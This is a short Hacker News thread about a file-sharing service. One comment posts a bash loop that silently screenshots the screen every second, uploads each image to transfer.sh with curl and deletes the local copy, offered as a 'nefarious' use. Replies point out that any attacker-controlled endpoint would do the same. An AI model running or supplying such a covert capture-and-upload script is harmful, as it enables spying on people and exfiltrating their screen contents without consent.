Hacker News new | past | comments | ask | show | jobs | submit login

Idea where can such service be used for nefarious purposes:

  while true
  do 
    dt=$(date '+%d%m%Y%H:%M:%S');
    screencapture -x file$dt.png
    curl --upload-file ./file$dt.png https://transfer.sh/66nb8/capture$dt.png
    rm file$dt.png
    sleep 1
  done



If you can get that script to run on a user's machine, they're hosed whether or not this service exists. Curl or mail to an endpoint in the attacker's control would be equally effective.


Sorry, I did not intend to discount this service in any way. More like showing a practical use.




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: